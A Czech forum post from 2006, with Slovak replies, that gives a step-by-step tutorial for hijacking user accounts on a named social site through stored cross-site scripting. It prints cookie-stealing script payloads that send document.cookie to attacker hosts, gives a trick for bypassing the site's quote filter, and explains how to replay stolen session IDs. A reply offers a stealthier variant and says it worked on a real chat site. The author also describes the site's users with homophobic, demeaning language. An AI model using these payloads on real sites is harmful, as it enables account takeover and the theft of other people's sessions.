tojsemja.cz aneb tojsemposral

29.04.2006 18:13 | blackhole

tojsemja.cz je server pro mlade nadrzene naivni lidicky okolo 13ti let, homosexuali a pedofili. Navzajem si ukazuji fotky bedaru na zadecku a podobne. To o cem si pisou homosexualove a pedofilove nebudu rozebirat (je to nechutny).

Jak kamaradovi, kamaradce, homosexualovi, pedofilovi zmenit ucet?:

1. SET UR SELF ANONYMOUS!!!
2. vytvor noveho uzivatele
3. vytvorte si cookie stealer
4. poslete obeti zpravu ktera vypada nejak takto:

<script>document.location = &#39http://evil.hell/cookiestealer.php?val=&#39 + document.cookie</script>

5. pockejte az se pujde obet podivat do zprav
6. checknete log cookie stealeru
7. otevrete url http://tojsemja.cz/?akce=vzkazy&sid=&#34zde vlozte hodnotu XLAND_SESSION_ID&#34
8. nini jdete na http://tojsemja.cz
9. MAKE IT BAD!

Prihlaseni plati po celem xlandu a vsech sluzbach.

Tip: chytani nahodnych XLAND_SESSION_ID

V nastaveni uctu jde pridat obrazek a k nemu komentar. Do komentare muzete vlozit podobny scriptik tomu predchozimu ktery presmerovava navstevniky. S tim uz si pohrajte sami.

Admini byli upozorneni na chyby, ale vyzvu ignorovali.

poznamky:
co je to cookie stealer najdete zde
input je osefovany, ale ne nejak extra.. jediny znak ktery se kontroluje je &#34 ktery je nahraditelny znakem &#39

    • njn 01.05.2006 | 11:48
      Avatar blackhole   Návštevník
      nieco podobne funguje aj na SK azete... smutne.
      • jo to nevim.. ale je to 01.05.2006 | 11:50
        Avatar blackhole   Návštevník

        jo to nevim.. ale je to mozny

      • scripty? 01.05.2006 | 18:46
        Avatar blackhole   Návštevník

        Ale, tam sa neda poslat script vo forme, aby bol vykonany - maximalne ho vypise ako text...
        Alebo nie ? :o)

    • javascript - presmerovanie 07.05.2006 | 01:29
      Avatar blackhole   Návštevník

      myslim ze je lepsie pouzit nieco ako:

      <s cript>
        obr = new Image();
        obr.src = 'http://ab.cd/stealcookie.php?c=' + document.cookie;
      </s cript>

      nepouziva sa pri tom presmerovanie, takze sa zobrazi standartny obsah. Skusal som to na jednom
      slovenskom chate a funguje to bezproblemov.

      V pripade za sa sessionID nenastavuje cez GET parameter ako v tomto pripade.. da sa nastavit aj priamo v cookie. Ja pouzivam Cookie Editor extension Firefoxu.

      • good tip, a nerozdrbe to tak 07.05.2006 | 13:37
        Avatar blackhole   Návštevník

        good tip, a nerozdrbe to tak stranky :)